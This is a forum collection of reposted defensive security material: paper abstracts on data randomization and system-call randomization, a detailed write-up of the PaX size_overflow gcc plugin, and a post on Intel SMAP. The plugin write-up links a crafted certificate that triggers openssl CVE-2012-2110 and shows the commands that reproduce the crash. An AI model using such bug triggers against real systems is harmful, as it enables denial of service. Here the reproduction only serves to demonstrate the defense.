Everything posted by Nytro
-
Data Randomization
Cristian Cadar (Microsoft Research Cambridge, UK; cristic@stanford.edu), Periklis Akritidis (Microsoft Research Cambridge, UK; pa280@cl.cam.ac.uk), Manuel Costa (Microsoft Research Cambridge, UK; manuelc@microsoft.com), Jean-Philippe Martin (Microsoft Research Cambridge, UK; jpmartin@microsoft.com), Miguel Castro (Microsoft Research Cambridge, UK; mcastro@microsoft.com)

Abstract: Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. Then it assigns a random mask to each class and it generates code instrumented to xor data read from or written to memory with the mask of the memory operand's class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can prevent many attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11% (0% to 27%) and an average space overhead below 1%.

Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
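To make the xor-masking idea concrete, here is a small hand-written sketch of what the instrumentation amounts to. This is an illustration only, not the paper's compiler pass: the equivalence classes and masks are assigned by hand here, whereas the real system derives the classes from static points-to analysis and emits the xor instructions automatically.

/* Toy illustration of data randomization: every memory access is xored with
 * the random mask of its static equivalence class, so an access that uses
 * the wrong class's mask yields garbage.  Class assignment is manual here. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

static uint32_t mask_class_a;   /* mask for operands that may alias 'a' */
static uint32_t mask_class_b;   /* mask for operands that may alias 'b' */

static void store32(uint32_t *p, uint32_t v, uint32_t mask) { *p = v ^ mask; }
static uint32_t load32(const uint32_t *p, uint32_t mask)    { return *p ^ mask; }

int main(void)
{
    uint32_t a = 0, b = 0;
    srand(1234);                      /* stand-in for a real entropy source */
    mask_class_a = (uint32_t)rand();
    mask_class_b = (uint32_t)rand();

    store32(&a, 0xdeadbeef, mask_class_a);
    store32(&b, 0x01020304, mask_class_b);

    /* Legitimate access: instrumented with the matching mask. */
    printf("a = %08x\n", (unsigned)load32(&a, mask_class_a));

    /* An out-of-class access (e.g., through a corrupted pointer) is decoded
     * with the wrong mask and produces an unpredictable value. */
    printf("a via wrong class = %08x\n", (unsigned)load32(&a, mask_class_b));
    return 0;
}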
-
Thwarting Code Injection Attacks with System Service Interface Randomization
Xuxian Jiang (George Mason University, xjiang@ise.gmu.edu), Helen J. Wang (Microsoft Research, helenw@microsoft.com), Dongyan Xu (Purdue University, dxu@cs.purdue.edu), Yi-Min Wang (Microsoft Research, ymwang@microsoft.com)

Abstract: Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operating systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. The two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes the instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, a trivial combination of both schemes is not sufficient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR along with a number of new enhancements to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead.

Keywords: Internet Security, Code Injection Attack, System Randomization

Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
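The abstract's key idea (make the system call interface a per-process secret so that injected code cannot use it) can be illustrated with a small user-space toy. This is only an intuition aid under simplifying assumptions; RandSys itself randomizes real system call instructions at load time and de-randomizes them at the kernel boundary, which the sketch below does not attempt to model.

/* Toy illustration of system service interface randomization: the mapping
 * from service number to handler is permuted with a per-process secret, so
 * injected code that uses the well-known numbers requests the wrong (or no)
 * service.  User-space sketch for intuition only. */
#include <stdio.h>
#include <stdlib.h>

#define NR_SERVICES 4
static unsigned key;                       /* per-process random key */

static void svc_exit(void)  { puts("exit");  }
static void svc_write(void) { puts("write"); }
static void svc_open(void)  { puts("open");  }
static void svc_exec(void)  { puts("exec");  }
static void (*services[NR_SERVICES])(void) =
        { svc_exit, svc_write, svc_open, svc_exec };

/* De-randomizing dispatcher: only call sites that know the key reach the
 * intended service. */
static void dispatch(unsigned randomized_nr)
{
    unsigned nr = randomized_nr ^ key;
    if (nr >= NR_SERVICES) { puts("bogus request - killed"); exit(1); }
    services[nr]();
}

int main(void)
{
    srand(42);                             /* stand-in for a real entropy source */
    key = (unsigned)rand();

    dispatch(3 ^ key);   /* legitimate, randomized call site: runs svc_exec */
    dispatch(3);         /* "injected" code using the standard number: with
                          * overwhelming probability this is out of range */
    return 0;
}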
-
Linux Security in 10 years Brad Spengler / grsecurity Download: grsecurity.net/spender_summit.pdf
-
The Guaranteed End of Arbitrary Code Execution Online: http://grsecurity.net/PaX-presentation_files/frame.htm
-
Inside the Size Overflow Plugin
by ephox » Tue Aug 28, 2012 5:30 pm

Hello everyone, my name is Emese (ephox). You may already know me for my previous project, the constify gcc plugin that pipacs took over and put into PaX: http://www.grsecurity.net/~ephox/const_plugin/

This time I would like to introduce to you a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin called size_overflow, whose purpose is to detect a subset of integer overflow security bugs at runtime: https://grsecurity.net/~ephox/overflow_plugin/

On integer overflows briefly

In the C language integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one), the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of a memory allocator function becomes smaller due to the overflow. There is a very good description of integer overflows in Phrack: http://www.phrack.org/issues.html?issue ... 10#article

The history of the plugin

The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example:

#define kmalloc(size,flags) \
({ \
    void *buffer = NULL; \
    intoverflow_t overflow_size = (intoverflow_t)size; \
 \
    if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \
        buffer = kmalloc((size_t)overflow_size, (flags)); \
    buffer; \
})

This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions. The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function, and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore, if there was an integer overflow during the evaluation of the other expressions, the remaining computation would use the overflowed value, which the intoverflow_t cast cannot detect. Second, only a few basic allocator functions had wrapper macros, because wrapping every function with a size argument would have been a big job and would have resulted in an unmaintainable patch. In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression.
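A small hand-written example of the limitation described above (not taken from the PaX patch): if only the final expression is widened, an overflow that already happened in an earlier 32-bit subexpression goes unnoticed, while recomputing the whole expression in the wider type exposes it.

/* Why checking only the final expression is not enough.  Assume a 32-bit
 * size type and a 64-bit "intoverflow_t"-style check applied only to the
 * last value. */
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint32_t nmemb = 0x40000001u;          /* attacker-controlled count */
    uint32_t size  = 8;                    /* element size              */

    /* The overflow happens here, in 32-bit arithmetic: the true product
     * 0x200000008 is truncated to 8. */
    uint32_t bytes = nmemb * size;

    /* A check that only widens the final expression sees the already
     * truncated value and passes. */
    uint64_t checked = (uint64_t)bytes;
    printf("checked = %llu (fits: %d)\n",
           (unsigned long long)checked, checked <= 0xffffffffULL);

    /* Recomputing the whole expression in the wider type, as the
     * size_overflow plugin does, exposes the overflow. */
    uint64_t wide = (uint64_t)nmemb * size;
    printf("wide    = %llu (fits: %d)\n",
           (unsigned long long)wide, wide <= 0xffffffffULL);
    return 0;
}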
Internals of the size_overflow plugin

The compilation process is divided into passes, and a plugin can insert its own pass in between or in place of existing ones. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass, which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin.

Before I describe the plugin in more detail, let's look at some gcc terms. The gimple structure in gcc represents the statements (stmt) of the high level language. For example, this is what a function call (gimple_code: GIMPLE_CALL) looks like:

gimple_call <malloc, D.4425_2, D.4421_15>

or a subtract (gimple_code: GIMPLE_ASSIGN) stmt:

gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5>

This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones. Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see, the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15), which is also the lhs of the assignment, so there is a use-def relation between the two stmts, that is, the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt. Further reading on SSA and GIMPLE:

SSA - GNU Compiler Collection (GCC) Internals
GIMPLE - GNU Compiler Collection (GCC) Internals

The plugin gets called for each function and goes through its stmts looking for calls to marked functions. In the kernel, functions can be marked in two ways:

- with a function attribute, for functions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread)
- listed in a hash table (for functions calling the above basic functions)

In userland there is only a hash table (e.g., openssl). The present description covers the kernel.

The attribute

Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like:

__attribute__((size_overflow(1)))

where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute, similarly to other attributes: __size_overflow(...). For example:

unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2);
static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags) { ... }

Further documentation about attributes: Attributes - GNU Compiler Collection (GCC) Internals

The hash table

Originally we only had the attribute, similarly to the constify plugin, but in order to reduce the kernel patch size (e.g., in 3.5.1, 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h. A hash table entry is described by the size_overflow_hash structure, whose fields are the following:

- next: the hash chain pointer to the next entry
- name: name of the function
- param: an integer with bits set corresponding to the size parameters

For example, this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like:

struct size_overflow_hash _000008_hash = {
    .next  = NULL,
    .name  = "kmalloc",
    .param = PARAM1,
};

The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()).
Example:

struct size_overflow_hash *size_overflow_hash[65536] = {
    [11268] = &_000008_hash,
};

The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html

Enabling the size_overflow plugin in the kernel

in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters
.config (under PaX): CONFIG_PAX_SIZE_OVERFLOW
.config (without PaX): CONFIG_SIZE_OVERFLOW

stmt duplication with double wide integer types

When the plugin finds a marked function, it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy. In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type:

- function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo
- inline asm (GIMPLE_ASM): it may have side effects too
- taking the address of an object (ADDR_EXPR): todo
- pointers (MEM_REF, etc.): todo
- division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types
- global variables: todo

If the marked function's parameter can be traced back to a parameter of the caller, then the plugin checks if the caller is already in the hash table (or is marked with the attribute). If it isn't, then the plugin prints the following message:

"Function %s is missing from the size_overflow hash table +%s+%d+%u+" (caller's name, parameter's number, hash)

If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it.

Inserting the overflow checks

The plugin inserts overflow checks in the following cases:

- marked function parameters, just before the function call
- stmt with a constant operand, see gcc intentional overflow
- negations (BIT_NOT_EXPR)
- type cast stmts between these types:

---------------------------------
| from | to   | lhs  | rhs |
---------------------------------
| u32  | u32  |  -   |  !  |
| u32  | s32  | TODO |  *! |
| s32  | u32  | TODO |  *! |
| s32  | s32  |  -   |  !  |
| u32  | u64  |  !   |  !  |
| u32  | s64  | TODO |  !  |
| s32  | u64  | TODO |  !  |
| s32  | s64  |  !   |  !  |
| u64  | u32  |  !   |  !  |
| u64  | s32  | TODO |  !  |
| s64  | u32  | TODO |  !  |
| s64  | s32  |  !   |  !  |
| u64  | u64  |  -   |  !  |
| u64  | s64  | TODO |  *! |
| s64  | u64  | TODO |  *! |
| s64  | s64  |  -   |  !  |
---------------------------------

Legend:
from: source type
to: destination type
lhs: is the lhs checked?
rhs: is the rhs checked?
!: the plugin inserts an overflow check
TODO: would be nice to insert an overflow check, see todo
*!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction)
-: no overflow check is needed

When the plugin finds one of the above cases, it will insert a range check against the double wide variable value (TYPE_MIN, TYPE_MAX of the original variable type). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check detects an overflow, the report_size_overflow function will be called instead of executing the following stmt.
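In C terms, the effect of the duplication plus the inserted range check is roughly the following. This is a hand-written, self-contained illustration for a 32-bit size type, not output of the plugin (which operates on GIMPLE); the names checked_alloc and the argument values are made up.

/* Rough C equivalent of the instrumentation described above. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

static void report_size_overflow(const char *file, unsigned int line,
                                 const char *func, const char *ssa_name)
{
    fprintf(stderr, "size overflow detected in function %s %s:%u %s\n",
            func, file, line, ssa_name);
    exit(1);
}

void *checked_alloc(uint32_t a, uint32_t b, uint32_t hdr)
{
    /* duplicated computation in the double wide type */
    uint64_t wide = (uint64_t)a * b + hdr;
    /* original computation, kept so gcc can still optimize it out */
    uint32_t c = a * b + hdr;
    (void)c;
    /* inserted range check against TYPE_MAX of the original 32-bit type */
    if (wide > 0xffffffffULL)
        report_size_overflow(__FILE__, __LINE__, __func__, "wide (max)");
    /* the call uses the value cast down from the wide clone */
    return malloc((uint32_t)wide);
}

int main(void)
{
    /* 0x10000 * 0x10000 overflows 32 bits, so the check fires here */
    free(checked_alloc(0x10000, 0x10000, 16));
    return 0;
}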
The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable. If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function, the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations, try this command (on the kernel):

objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l

report_size_overflow

The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition always has to be provided by the current program; the plugin inserts only the report_size_overflow calls. This is a no-return function. It prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc, it prints out the caller's start line number. The last two strings are only debug information. The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX):

PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max)

In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace, and then a SIGKILL is sent to the process that triggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV.

Plugin internals through a simple example

The source code (test.c):

extern void *malloc(size_t size) __attribute__((size_overflow(1)));

void * __attribute__((size_overflow(1))) coolmalloc(size_t size)
{
    return malloc(size);
}

void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name)
{
    printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name);
    _exit(1);
}

int main(int argc, char *argv[])
{
    unsigned long a;
    unsigned long b;
    unsigned long c = 10;

    a = strtoul(argv[1], NULL, 0);
    b = strtoul(argv[2], NULL, 0);
    c = c + a * b;
    return printf("%p\n", coolmalloc(c));
}

Compile the plugin:

gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c

Compile test.c with the plugin and dump its ssa representations:

gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all

Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc; the traced parameter is c_12.
The main function's ssa representation is below, just before executing the size_overflow pass (test.c.*.ssa*):

main (int argc, char * * argv)
{
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  D.3288_11 = a_6 * b_10;
  c_12 = D.3288_11 + c_1;
  D.3290_13 = coolmalloc (c_12);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*):

main (int argc, char * * argv)
{
  long unsigned int cicus.7;
  long long unsigned int cicus.6;
  long long unsigned int cicus.5;
  long long unsigned int cicus.4;
  long long unsigned int cicus.3;
  long long unsigned int cicus.2;
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  cicus.5_24 = (long long unsigned int) c_1;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  cicus.2_21 = (long long unsigned int) a_6;
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  cicus.3_22 = (long long unsigned int) b_10;
  D.3288_11 = a_6 * b_10;
  cicus.4_23 = cicus.2_21 * cicus.3_22;
  c_12 = D.3288_11 + c_1;
  cicus.6_25 = cicus.4_23 + cicus.5_24;
  cicus.7_26 = (long unsigned int) cicus.6_25;
  if (cicus.6_25 > 4294967295) goto <bb 3>; else goto <bb 4>;

<bb 3>:
  report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n");

<bb 4>:
  D.3290_13 = coolmalloc (cicus.7_26);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

Some problems encountered during development

- gcc intentional overflow: Gcc can produce unsigned overflows while transforming expressions, e.g., it can transform constants in a way that produces the correct result with unsigned overflow on the given type (e.g., a-1 -> a+4294967295). The plugin used to detect this (false positive) overflow at runtime. The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in later duplication. For example, on 32 bit, for coolmalloc(a * b - 1 + argc):

before the size_overflow plugin:

  ...
  D.4416_10 = a_5 * b_9;
  D.4418_13 = D.4416_10 + argc.0_12;
  D.4419_14 = D.4418_13 + 4294967295;
  D.4420_15 = coolmalloc (D.4419_14);
  ...

after the size_overflow plugin:

  ...
  D.4416_10 = a_5 * b_9;
  cicus.7_25 = cicus.4_22 * cicus.6_24;
  D.4418_13 = D.4416_10 + argc.0_12;
  cicus.9_27 = cicus.7_25 + cicus.8_26;
  cicus.10_28 = (unsigned int) cicus.9_27;
  cicus.11_29 = (long long unsigned int) cicus.9_27;
  if (cicus.11_29 > 4294967295) goto <bb 3>; else goto <bb 4>;

<bb 3>:
  report_size_overflow ("test.c", 28, "main");

<bb 4>:
  D.4419_14 = cicus.10_28 + 4294967295;
  cicus.12_30 = (long long int) D.4419_14;
  ...
- when a size parameter is used for more than one purpose (not just for size): the plugin cannot recognize this case. When I get a false positive report, I remove the function from the hash table.
- type casts from gcc or the programmer causing intentional overflows: this is the reason for the TODOs in the table above.

Detecting a real security issue

I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110). The overflow can be reproduced with this test case: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz

Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/
Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/

Compile openssl with the plugin (see the README); after that we can reproduce the bug:

openssl-1.0.0.h/bin $ ./openssl version
OpenSSL 1.0.0h 12 Mar 2012
openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER
Segmentation fault

In syslog there is the plugin's message:

SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max)

I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/

Performance impact

hardware: quad core sandy bridge
kernel version: 3.5.1
patch: pax-linux-3.5.1-test16.patch
overflow checks after optimization (gcc-4.7.1): 931

With the size_overflow plugin disabled:

Performance counter stats for 'du -s /test' (10 runs):

  4345.283145 task-clock              # 0.983 CPUs utilized            ( +- 0.12% )
  1,107 context-switches              # 0.255 K/sec                    ( +- 0.09% )
  0 CPU-migrations                    # 0.000 K/sec                    ( +-100.00% )
  3,763 page-faults                   # 0.866 K/sec                    ( +- 0.13% )
  14,641,126,270 cycles               # 3.369 GHz                      ( +- 0.03% )
  4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle  ( +- 0.06% )
  1,962,172,809 stalled-cycles-backend  # 13.40% backend cycles idle   ( +- 0.23% )
  25,463,911,605 instructions         # 1.74 insns per cycle
                                      # 0.17 stalled cycles per insn   ( +- 0.01% )
  6,968,592,408 branches              # 1603.714 M/sec                 ( +- 0.01% )
  47,230,732 branch-misses            # 0.68% of all branches          ( +- 0.07% )

  4.419888484 seconds time elapsed                                     ( +- 0.12% )

With the size_overflow plugin enabled:

Performance counter stats for 'du -s /test' (10 runs):

  4291.088943 task-clock              # 0.983 CPUs utilized            ( +- 0.08% )
  1,093 context-switches              # 0.255 K/sec                    ( +- 0.08% )
  0 CPU-migrations                    # 0.000 K/sec
  3,761 page-faults                   # 0.877 K/sec                    ( +- 0.15% )
  14,481,436,247 cycles               # 3.375 GHz                      ( +- 0.05% )
  4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle  ( +- 0.15% )
  2,003,994,250 stalled-cycles-backend  # 13.84% backend cycles idle   ( +- 0.54% )
  25,436,031,783 instructions         # 1.76 insns per cycle
                                      # 0.16 stalled cycles per insn   ( +- 0.00% )
  6,960,975,325 branches              # 1622.193 M/sec                 ( +- 0.00% )
  47,125,984 branch-misses            # 0.68% of all branches          ( +- 0.07% )

  4.365185965 seconds time elapsed                                     ( +- 0.08% )

TODO: I don't know why it was faster with the plugin in these tests. During compilation the plugin didn't cause too much slowdown (only 0.077s).
Allyesconfig kernel statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2):

3.5.0: vmlinux_4.6.x_i386-yes: 2556, vmlinux_4.6.x_x86_64-yes: 2659
3.2.26: vmlinux_4.6.x_i386-yes: 2657, vmlinux_4.6.x_x86_64-yes: 2756
2.6.32.59: vmlinux_4.6.x_i386-yes: 1893, vmlinux_4.6.x_x86_64-yes: 2353

Future plans

- enable the plugin to compile c++ sources
- compile the following programs with the plugin:
  - glibc: I tried to compile it already but the make system doesn't like my report_size_overflow function, so I'll try it later
  - glib
  - syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem)
  - firefox
  - chromium
  - samba
  - apache
  - php
  - the Android kernel
  - anything with an integer overflow CVE
- plugin internals plans:
  - print out the overflowed value in the report message
  - comments
  - optimization: use unlikely/__builtin_expect for the inserted checks
  - if the expression can be tracked back to the result of a function call then the function's return value should be tracked back as well
  - handle ADDR_EXPR
  - make use of LTO (gcc 4.7+): could get rid of the hash table
  - llvm size_overflow plugin
  - an IPA pass to be able to track back across static functions in a translation unit; it would reduce the hash table
  - handle function pointers
  - handle struct fields
  - fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct
  - solve all the TODO items in the cast handling table

If anyone's interested in compiling other userland programs with the plugin, please send me the hash table and the patch.

Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
-
[h=3]Supervisor Mode Access Prevention[/h]
by PaX Team » Fri Sep 07, 2012 9:05 pm

With the latest release of their Architecture Instruction Set Extensions Programming Reference, Intel has finally lifted the veil on a new CPU feature to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP), and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago.

While the purpose of SMEP was to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory.

The twist in the story, and the reason why these security features couldn't be implemented as one, lies in the fact that the kernel does have a legitimate need to access data in userland memory at times, while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching of SMAP at runtime. This will require more extensive changes in kernel code than SMEP did, but the amount of code is still quite manageable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves.
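To illustrate what such switching around an accessor might look like, here is a rough kernel-context sketch. This is not the actual Linux or PaX implementation: the helper names and __raw_copy_from_user are made up, and real code would use alternatives/feature patching so the instructions are only emitted on SMAP-capable CPUs. The .byte sequences encode stac (0F 01 CB) and clac (0F 01 CA) for assemblers that don't know the mnemonics yet.

/* Illustrative sketch only.  STAC sets EFLAGS.AC in supervisor mode and
 * temporarily permits accesses to user pages; CLAC clears it again.
 * __raw_copy_from_user() is a hypothetical stand-in for the arch-specific
 * unchecked copy routine. */
static inline void smap_allow_user_access(void)
{
	asm volatile(".byte 0x0f, 0x01, 0xcb" ::: "memory");	/* stac */
}

static inline void smap_block_user_access(void)
{
	asm volatile(".byte 0x0f, 0x01, 0xca" ::: "memory");	/* clac */
}

static inline unsigned long copy_from_user_sketch(void *dst, const void *src,
						  unsigned long n)
{
	unsigned long ret;

	smap_allow_user_access();	/* open the window for this access only */
	ret = __raw_copy_from_user(dst, src, n);
	smap_block_user_access();	/* close it again immediately */
	return ret;
}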
What does SMAP mean for PaX? The situation is similar to last year's SMEP, which made an efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead, which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF, which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF, there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself.

What does SMAP mean for security? Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways; e.g., attacker controlled pointers can no longer target userland memory directly, and even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP, this means that future exploits against memory corruption bugs will have to rely entirely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This of course means that for reliable exploitation, detailed knowledge of runtime kernel memory will be at a premium, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs.

While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses, and that is exactly the escape hatch that several exploits have already targeted; we can expect more in the future. Fortunately we are once again at the forefront of this game, with several features that prevent or at least greatly reduce the amount of information that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY).

TL;DR: Intel implements a UDEREF equivalent 6 years after PaX; PaX will make use of it on amd64 for improved performance.

Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
-
